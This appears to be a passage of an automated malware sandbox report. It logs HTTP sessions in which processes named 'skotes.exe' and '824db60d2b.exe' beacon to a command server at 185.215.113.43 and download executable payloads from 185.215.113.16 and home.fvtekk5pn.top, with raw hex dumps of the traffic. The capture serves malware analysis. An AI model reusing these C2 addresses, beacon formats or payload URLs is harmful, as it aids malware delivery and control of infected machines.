                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:13.170104027 CET1236INData Raw: e9 82 87 ef b8 d7 cd 69 ae 84 ef 40 3a 1a 47 bb c9 ba 91 6d 35 ae 8f 01 b2 89 91 2d d4 5b 95 2d 01 96 20 c1 1f a7 7f 9e 36 0e 4d 12 b3 ea 3b 09 a3 58 b2 b1 ef d7 71 11 c3 73 73 e5 cd e6 c3 db 98 f0 4c 1d b8 01 18 77 64 ae ac 85 c1 da 1f dd 0a 75
                                                                                                                                                                                                                                                                                      Data Ascii: i@:Gm5-[- 6M;XqssLwduZ:pik?:L*5q.!M3V1m{90nt4g_:cWs'#VRJm"3'!p*:b=f{x
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:13.170119047 CET1236INData Raw: 3e ad b1 f5 9b 3f c3 e3 74 2c e3 81 53 1e eb 43 fe 45 0e 27 16 e6 21 8d 56 39 ac fd 1d 56 7d cf 63 46 c6 ec 37 df 3d 9a f6 9b 40 ab c5 51 cb f9 1e 4f 3d c5 8c 60 47 9e 46 80 eb 0d 16 3e 74 42 c1 67 e7 4a 2c a8 4f d0 f3 c8 ef 49 a0 de 8c 98 1f 58
                                                                                                                                                                                                                                                                                      Data Ascii: >?t,SCE'!V9V}cF7=@QO=`GF>tBgJ,OIX?)&fb>H0THAB622i4v7Jr-djf9k;}&1BBCJG_,^6Zk\dgWfWu I!,?e&;yp!^op6^X!(
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:13.170135975 CET1236INData Raw: 33 1a 54 c5 d4 72 97 d0 f8 b5 87 52 7a 28 50 15 a1 81 c6 e3 27 22 64 cd ea b7 3c 0d 40 c9 26 1e 4e 03 01 45 d9 9f 2b c8 3b 07 b7 d6 de 9a 27 62 39 7c 2c 97 b9 c5 a8 4b 0b 8c f6 29 8f c0 01 e8 15 d8 af f2 90 b2 08 06 70 01 54 30 bd e0 04 70 d8 5c
                                                                                                                                                                                                                                                                                      Data Ascii: 3TrRz(P'"d<@&NE+;'b9|,K)pT0p\iqN-,E%c"h~!ywpg1I>a'2#7qR.#C{C4QRMy9E_m7Y\8|$5R::X=08FA`
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:13.170362949 CET552INData Raw: d0 89 04 fb 17 fe b7 06 9d d7 0c e5 39 5c fd 6f bc 36 05 ec ba 56 10 cf de 5e da 1f 4b c0 e7 7c eb 05 fc 20 12 4f e1 e9 c9 74 23 e3 10 03 5a 02 85 46 67 90 c2 c2 ff e8 c6 a1 44 f9 ad 20 dd 6a e9 1c e0 9e 35 a2 3c 2a 68 08 19 e4 4d 35 ba 09 76 a8
                                                                                                                                                                                                                                                                                      Data Ascii: 9\o6V^K| Ot#ZFgD j5<*hM5v]Z^WMl+Hn=J#0I6Gy_'j3CBG;*Ws}=AMO:<zgp(Ek7"ON+RIIhY%
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:13.170378923 CET1236INData Raw: c3 a5 85 be c1 b6 a5 4f 79 a3 27 43 c6 a6 6a 81 bd de 6f 15 b4 2a 09 17 dd 24 74 e8 ed 7d 38 11 c9 8c eb 1e 9a fe c0 53 de 44 3a ee 20 52 23 bb c1 41 00 a5 a1 1f 93 e3 c7 8a d3 00 31 fa 31 21 b8 29 b6 80 75 1f 6c 09 a4 ef 12 31 8f e4 f5 9a d2 18
                                                                                                                                                                                                                                                                                      Data Ascii: Oy'Cjo*$t}8SD: R#A11!)ul1',AqnQ0ttIWoXr(#72*T/rdOb6'-5'-Hn",MD*4-efM> .]\:iZSn?Y8{jA
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:13.170394897 CET1236INData Raw: 7f c1 dd 07 43 03 51 35 46 35 a6 3d 96 1c 5f 8d f0 a4 e3 24 90 e1 d2 33 d1 3a 56 3e b5 88 30 df f4 62 df 1e 96 04 67 4d 56 36 c3 1f 79 86 09 61 f2 64 07 69 b9 5c 01 65 67 7b 2c c3 cd ed 58 a5 31 9e d5 6f 20 49 9d fd d4 0e c8 99 a7 29 0b 3e 7b 88
                                                                                                                                                                                                                                                                                      Data Ascii: CQ5F5=_$3:V>0bgMV6yadi\eg{,X1o I)>{MI,vY_G2j3S3pr~JOi ]3&7xSzTN?3-bv%?A~0|Q$V"OAK(Qnf!%Q4;FcNMJ['


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      9192.168.2.65011434.116.198.130806984C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:12.626562119 CET87OUTGET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: home.fvtekk5pn.top
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:13.400645018 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      server: nginx/1.22.1
                                                                                                                                                                                                                                                                                      date: Wed, 20 Nov 2024 09:55:13 GMT
                                                                                                                                                                                                                                                                                      content-type: application/octet-stream
                                                                                                                                                                                                                                                                                      content-length: 10815536
                                                                                                                                                                                                                                                                                      content-disposition: attachment; filename="36EpLiutqfXtaXMkXOTru;"
                                                                                                                                                                                                                                                                                      last-modified: Tue, 19 Nov 2024 12:29:07 GMT
                                                                                                                                                                                                                                                                                      cache-control: no-cache
                                                                                                                                                                                                                                                                                      etag: "1732019347.4431374-10815536-3919321515"
                                                                                                                                                                                                                                                                                      Data Raw: 9b 04 9e 1d e2 2a 68 73 fe d9 48 6f 2c 36 36 c8 a4 e4 ba e7 12 f9 22 5d 6f 07 aa d2 fb 8c a2 b3 95 1e b6 6c ff 92 32 40 41 97 30 99 34 26 c9 44 c2 1e 7f 22 13 cd 10 62 a7 32 f3 c2 5c 11 ed c0 71 4a 49 c7 9d 3e 95 07 3e 4a 0a 6f 63 4c 1a b8 b6 1a 3d 67 8e 9d ed 46 4c 04 61 0a c6 3c 7b 3a f6 0d 3f 30 0d 33 18 56 4c f0 76 7a 8b c7 a1 f1 75 64 d6 00 c3 e9 df 3a 1b 4f 35 50 64 a6 db 6b 23 6a aa e6 6c 33 a4 69 a7 80 16 e0 e4 49 7c d0 73 7d bf 61 a2 62 7a 62 8e 5b f4 4d a9 ba 05 ae 7f d8 0c 3c 1e 71 cb 84 47 32 b1 63 64 df 8e 7a 22 8c 8e 33 7d f1 20 f1 74 04 61 fd 18 55 10 be 45 7d f4 63 45 d4 d0 16 17 c4 c8 a6 7d 44 80 d2 ba e9 1a 17 37 63 43 e4 22 3e c5 e4 a4 16 51 4f 2d 57 23 3a 36 33 fa f3 c5 aa 04 00 79 5c 1f 43 8d f1 b2 56 df 86 17 bc df 28 44 b7 aa 85 64 2d 2f 94 0d a5 7c 18 37 92 cb 0d 76 40 2e 05 16 6a ce b1 8c 0a e3 7d 08 00 ce 6a ef d3 51 b9 3b 81 19 3c 3f 6c 3e 37 fe 3f d7 b3 7d 60 7e e2 b1 a4 1f 00 62 27 63 3d fd 4b 06 87 dc 8e 8e fa 56 9b bf 7a dc a3 07 20 e3 0b 1a f5 06 b1 0f 6d 27 af dd 1b [TRUNCATED]
                                                                                                                                                                                                                                                                                      Data Ascii: *hsHo,66"]ol2@A04&D"b2\qJI>>JocL=gFLa<{:?03VLvzud:O5Pdk#jl3iI|s}abzb[M<qG2cdz"3} taUE}cE}D7cC">QO-W#:63y\CV(Dd-/|7v@.j}jQ;<?l>7?}`~b'c=KVz m'3~\K ^m_F<4xrG/dz4?gv5,?^w@X^wZ1~7C+Z&dp`#9XgJC>e93VGh74x?x[3=YT.Qa `M*G?_zGkB+(#8RUeY[x-$4`zAc`vmVlP+>tsd@>ydCHSnt+_`"FitXXD.}P #(4K<0b h;]6{bgEqvZ>4*o]2?}#|![L&*!z";ZY<PPT9HC}M*65qs#ep%@LlGH)bj'7a: ;B3L0"
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:13.400660992 CET184INData Raw: b8 ff 32 30 58 cd 81 20 5f b7 4d f7 d5 77 53 0a 4f e7 60 83 ed 44 cc d0 f5 71 1e 4e 4f f8 01 9b 7d 28 47 50 fb 75 8d 8e 55 9f 9d c6 2b 06 24 6f 58 e4 80 8f e0 a2 b4 79 5d f7 cf 4a e0 fc b8 91 16 d1 c7 db 64 34 ea ff 9a 7a 67 99 a9 5e e5 15 9c c8
                                                                                                                                                                                                                                                                                      Data Ascii: 20X _MwSO`DqNO}(GPuU+$oXy]Jd4zg^h(>sNk=@nIEbcZ"~Q6]4AGc]>2+<X]2]CRq[
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:13.400738001 CET1236INData Raw: 59 c2 c8 8d f5 61 e9 1e 7b 88 59 11 76 46 7b 6d 83 b8 32 15 b7 2a 62 09 67 ee c0 c5 33 03 fb 04 a6 7c b9 d6 38 cf c3 1c ce f2 49 de 42 8b d6 6c c4 14 6d ac f2 e1 0b 93 0d 26 12 b1 d9 54 a2 43 e2 5a ea 02 09 3f 92 9b 39 dd 18 aa 50 7b c9 fe 32 68
                                                                                                                                                                                                                                                                                      Data Ascii: Ya{YvF{m2*bg3|8IBlm&TCZ?9P{2hUPRb'aox!CoG3_]efWRl!JUXY=lKcg$UM)=2u*B*s>$)Zc&Y/g\Q=G%|I=tl
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:13.400755882 CET1236INData Raw: 02 53 a0 df c3 ea b2 13 46 7b 29 4f 66 93 b7 be fb b4 a1 98 0f 2a 49 ad 81 22 fa 26 02 ff 6c fa 36 b1 7e d1 2f 59 b8 0b 14 c3 4c b2 b9 03 6d 04 cc 1a ae 23 d5 03 4b be c3 c9 3e e3 86 85 eb ac 85 d3 44 f9 54 c4 ad 30 57 f6 26 a8 1f 0e 70 3d c7 f7
                                                                                                                                                                                                                                                                                      Data Ascii: SF{)Of*I"&l6~/YLm#K>DT0W&p=iU/zbt%:V-h\3Ad^V?P#BydYCH(4\bq>`hRc~0fJd"E--)6i2 {C<DkomA+H*
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:13.400773048 CET1236INData Raw: 1d 04 f6 17 3d c2 45 ca 92 2f 5a 7f ee c1 37 d0 e8 8d 8a 14 68 28 7d 5a 44 04 30 c9 45 88 5a 45 e1 5f aa bc 98 45 07 b1 50 e3 d0 8d 3d 35 3e fc 1a f8 4a 35 b2 01 42 c0 e0 91 bb 9b 19 60 5c 8f 21 4f 84 8a ac 41 2c 1c 96 e9 2d d1 12 6f 62 59 96 03
                                                                                                                                                                                                                                                                                      Data Ascii: =E/Z7h(}ZD0EZE_EP=5>J5B`\!OA,-obYCoV'3SvRDH)<:R::;blX?),lD#4Bs+]?R,j76J'\[sRKI&(Cs>HXrJi~;0/m
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:13.400790930 CET1236INData Raw: 98 99 9e 14 7d f4 53 74 5b 84 b1 04 49 f8 29 95 7e aa d1 d7 88 5e f9 ff 54 54 a4 50 59 f1 a6 dc 54 30 f2 fa b2 f9 a2 e1 8f 88 d9 63 12 d2 51 97 0e 59 30 3e 7e 61 9c 30 28 99 56 f1 4e 81 fb 0e c8 bc d9 fa 0e be 38 52 59 9c 20 75 d2 22 9c c5 fd b9
                                                                                                                                                                                                                                                                                      Data Ascii: }St[I)~^TTPYT0cQY0>~a0(VN8RY u"o,f>RB&VU_1wKw\OobTZ1pp-)s\d+]$QQnyl{yoW-=S!H@;3Z%W}EqcAFH
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:13.400816917 CET736INData Raw: cd 81 3b bc 8e 64 ea fa 8a b3 99 66 57 51 26 10 0a b9 73 f6 c3 7f 64 d5 91 62 6e fc 26 c2 22 9c 39 2a 0d c1 cd 57 ff c6 1f ae 4e 17 e3 c0 69 96 a9 34 5f 40 3d ff 82 d2 e7 7d 74 e1 db 3c dc cd 23 dc 85 3d ce 7e e9 4c fb 34 04 c6 39 55 00 c1 f3 6f
                                                                                                                                                                                                                                                                                      Data Ascii: ;dfWQ&sdbn&"9*WNi4_@=}t<#=~L49Uo__3xV`yI#@R}ueqhuewH{I:aniQW]|H`v/w~C[=w#:YR*2)32*t(R3`0kdwNC
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:13.402908087 CET1236INData Raw: a7 23 75 d9 4a cc 09 e0 ce d5 34 42 d5 9e 1a c8 d1 6e 5f e5 ee 81 7e 6c 10 bc 28 8b 4e b4 85 d7 7e d7 8d 76 5a 15 1d 94 d7 5c 83 e7 00 c3 dd f6 20 60 84 bf 40 4b 30 61 da f3 7a b6 aa 52 19 74 e1 50 44 7b 25 98 89 7b fc ad 61 fe 29 30 70 93 1e 44
                                                                                                                                                                                                                                                                                      Data Ascii: #uJ4Bn_~l(N~vZ\ `@K0azRtPD{%{a)0pD0o7i[w'ArYK,r!(mx"fY+cRu{.%o49`e|WlI#](&}/|vH3gpJ2IC}kS zH 6M-'}C|L
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:13.402924061 CET1236INData Raw: a0 c5 f8 5f db ba 96 de f8 e3 5f bb 9a ae ff a9 31 c0 05 dc 69 9d 42 ec 96 12 34 8d 46 b3 8f 84 c1 7d 5a 45 78 4d 39 a6 12 0d 34 2e 75 81 78 6d 02 a4 c4 8e b4 09 73 e1 93 44 8a 99 01 70 1e 8b 5e 1c 55 82 ba fe 09 b6 a6 5a a8 a5 14 4e ea db cf 27
                                                                                                                                                                                                                                                                                      Data Ascii: __1iB4F}ZExM94.uxmsDp^UZN'!Lji(V.G8O`a&i@kQr' V:Jb7;>:%B$'SRO1a=uH~@z4=Uny1'-s^b=}
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:13.402940035 CET1236INData Raw: 51 51 ef d8 1f 32 39 5f b3 0f cc 25 d7 71 83 b7 85 12 f3 32 b3 d6 b5 2f cb 22 4d 58 28 ab 60 f3 ce 02 4f 7f 73 d8 de 54 41 e6 bb 74 5c f4 40 f0 ea c8 95 dc fe 60 16 0f 78 d7 a0 bf 55 46 df 1f a5 fc a6 a2 0f 7a a2 b4 8f e2 1a db da 83 a9 f8 4d c9
                                                                                                                                                                                                                                                                                      Data Ascii: QQ29_%q2/"MX(`OsTAt\@`xUFzMe(C--:1}\*q(MZ7vki/1|<GTrL->}z8@I?chO/M'}:xUWJ#%A"Z2179x
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:13.407231092 CET1236INData Raw: cc 5b ff 5b a4 26 37 2b 24 17 99 ac 3f d4 2b c5 0d a8 79 04 c5 6b 06 8a fd 0c 39 9a 83 b2 bb f7 eb 7d 8b 33 ab 2e f8 f1 97 78 de de aa 3b af 14 bb b7 fb 46 63 b6 8c e7 cd a8 51 b1 2c c0 9d 5e ef 49 38 c4 26 79 4c 60 ae 0b 4b 43 a9 03 7b cb db f3
                                                                                                                                                                                                                                                                                      Data Ascii: [[&7+$?+yk9}3.x;FcQ,^I8&yL`KC{t#^<vm$MPEK55I/Z\A[K6w]}#>[Q6_XlgC3(O88=bp^kpH&20#SNRxs;*#kC7!O


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      10192.168.2.650115185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:17.145870924 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 31
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 64 31 3d 31 30 30 37 36 33 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                                      Data Ascii: d1=1007635001&unit=246122658369
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:17.846091032 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:55:17 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      11192.168.2.650117185.215.113.16807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:17.857657909 CET56OUTGET /steam/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: 185.215.113.16
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:18.584736109 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:55:18 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                      Content-Length: 1806336
                                                                                                                                                                                                                                                                                      Last-Modified: Wed, 20 Nov 2024 09:41:39 GMT
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      ETag: "673daed3-1b9000"
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 22 01 00 00 00 00 00 00 00 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 69 00 00 04 00 00 3a e9 [TRUNCATED]
                                                                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8kkk'kkkk&kkkkkkjkkk#kkkkRichkPELO/g"i@0i:@M$a$$ $b@.rsrc$r@.idata $t@ @*$v@riuyamynOx@ezwcdmtthh@.taggant0i"n@
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:18.584750891 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:18.584767103 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:18.584901094 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:18.584920883 CET1236INData Raw: 18 cc 23 ce 0d ef b6 4c 45 5b aa 43 ca 84 d1 46 18 85 a8 2b 86 a2 0f ed 2d 83 6d 2a 62 cc bf 32 7d ec 8c 4a c3 8f 5a 2d 03 55 ed 81 12 88 77 d2 e5 de af 5a 2d 87 13 95 24 6c a9 16 b3 7c 83 9d a5 b9 0b 8a 9d 9d 67 17 10 d7 b2 2b ac 5e 9f b3 25 74
                                                                                                                                                                                                                                                                                      Data Ascii: #LE[CF+-m*b2}JZ-UwZ-$l|g+^%tg:en'/U2W4p\\_?4Gcv."w,O8q9]&Cv^$%z`>U%si4=2-1s\|etQ}d=Z
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:18.584935904 CET1236INData Raw: 13 cb b4 ed 0c 84 c9 95 8b f7 02 d0 56 0f 5a 25 17 72 6b 5d 4c a4 6e 6e 8d c1 ff 24 e4 73 e7 b3 fb 71 e1 4e 03 98 78 94 58 e2 a9 16 65 52 55 b5 66 4f e6 43 cc 22 e7 0b c9 d7 b6 a5 a3 2a 7c 1d 56 fd 69 a0 31 cb 85 72 64 f8 26 f7 2b d8 ff 79 6c 29
                                                                                                                                                                                                                                                                                      Data Ascii: VZ%rk]Lnn$sqNxXeRUfOC"*|Vi1rd&+yl)6lal=?)(,Z&Y*[AMc+)I1#52SgdjW#!(S4(G+>;pcNv3`,W@^E&ic=3:-_j+a5.W
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:18.584954023 CET1236INData Raw: 2d 3c c8 79 b4 0c 07 7e 63 1c e1 b3 8d 0c ed cb 39 b8 db 35 6d 12 96 b5 8d 74 df 77 a9 84 1f 7e 31 a9 b6 3e 5d 19 99 ca 69 ae e6 31 1f 2c e0 93 7d 78 5b dd 89 43 f7 7a 17 37 7f 4b a9 72 6f da 55 43 21 7d a6 2c eb 93 c5 78 4f dd fd b8 ee 6a 68 4a
                                                                                                                                                                                                                                                                                      Data Ascii: -<y~c95mtw~1>]i1,}x[Cz7KroUC!},xOjhJF-dOy_#c8A>E/i;[b2+F5{Cl-+UD5r;xaK-Fs}1H*SDO?) kF?}I| nj<c?E-(8?nUrAuD_
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:18.585439920 CET1000INData Raw: 28 79 f6 cd b0 4d 1e df 13 28 59 d1 29 ae bb f4 48 f2 1c 8b af 46 27 3f a5 a9 9f 6e 69 39 5b a1 2d 46 73 7e 79 2c af 48 6c 37 b5 63 2d 46 1f 7f d9 12 5e d3 a6 78 e4 3f 52 2c ee 13 63 c0 5e df 75 86 a1 e3 fd 46 df cb 48 ac d3 37 95 7a 6b 05 14 0c
                                                                                                                                                                                                                                                                                      Data Ascii: (yM(Y)HF'?ni9[-Fs~y,Hl7c-F^x?R,c^uFH7zkAFrwecF=;[n;PCc9G_$T8oS[eG@fF?:,wcc3F3XJHSFOU_E;DHt})KM(ZcT
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:18.585463047 CET1236INData Raw: cd b8 a7 17 74 81 5b 5a d6 a4 99 d1 c1 44 fb 32 ac 1f df db 95 a0 57 ca bd b0 58 0c 11 2b ea 13 46 2e eb b9 43 44 c6 ae 1d ac 6b 36 ac 2e 99 d8 1e 72 cf bf 17 74 b9 1b a3 79 0f b6 48 32 e7 23 17 13 7b cb e5 ac f9 7e 5e b8 de b3 17 ec 9b 5f 43 f0
                                                                                                                                                                                                                                                                                      Data Ascii: t[ZD2WX+F.CDk6.rtyH2#{~^_CEV?BvU{5h@~UH#L]w~*hn3uxZO}F?-_Kh3Wy^mr??cOr'cD2G2O9!*Fh1"C~0coC
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:18.585480928 CET1236INData Raw: 4d 77 ad d0 f1 0c 2f d1 63 d0 e6 cb af 13 d6 d6 fd 33 a9 e8 a0 67 5e 3b 64 77 00 bf 53 10 e7 3f 17 18 b6 e3 b1 42 2a ec 09 12 a3 ca 79 72 af 68 94 46 77 b3 79 b8 a7 3f 51 8b 61 f7 3c 84 5f c2 99 b8 b9 1b ac 77 67 da e1 8e 88 0d 19 94 f0 dd c9 42
                                                                                                                                                                                                                                                                                      Data Ascii: Mw/c3g^;dwS?B*yrhFwy?Qa<_wgB)"SCG_}cy3,Ztz#Tr3tyC[dd}1x^,b1c9fy]iZQF-OFp/K}bwYJNg2SPD3xH
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:18.592145920 CET1236INData Raw: a0 11 6b 7f 8a 13 67 92 01 e5 1a e9 26 4b 0f 3e 5d 7b a2 03 54 85 65 7e 95 e2 ea b3 00 fa 49 ac 28 c6 7e 48 f0 e6 6b 04 52 32 aa 67 b0 40 ed a8 c3 d3 32 02 bc ea b9 b7 4b c3 9c 4f 17 04 0b df 70 09 24 d3 96 56 1f a6 9e 93 24 2b 78 fa 5e 43 2f 48
                                                                                                                                                                                                                                                                                      Data Ascii: kg&K>]{Te~I(~HkR2g@2KOp$V$+x^C/HDC;C&~c07=X?ov/\BZ$NWte3D/~,ChTP2Fk$4$/Z6dbsN6~"Y6MSqkqv1zloD


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      12192.168.2.650121185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:22.538271904 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 31
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 64 31 3d 31 30 30 37 36 33 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                                      Data Ascii: d1=1007636001&unit=246122658369
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:23.269345045 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:55:23 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      13192.168.2.650123185.215.113.16807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:23.322067976 CET55OUTGET /well/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: 185.215.113.16
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:24.057291031 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:55:23 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                      Content-Length: 922624
                                                                                                                                                                                                                                                                                      Last-Modified: Wed, 20 Nov 2024 09:39:46 GMT
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      ETag: "673dae62-e1400"
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
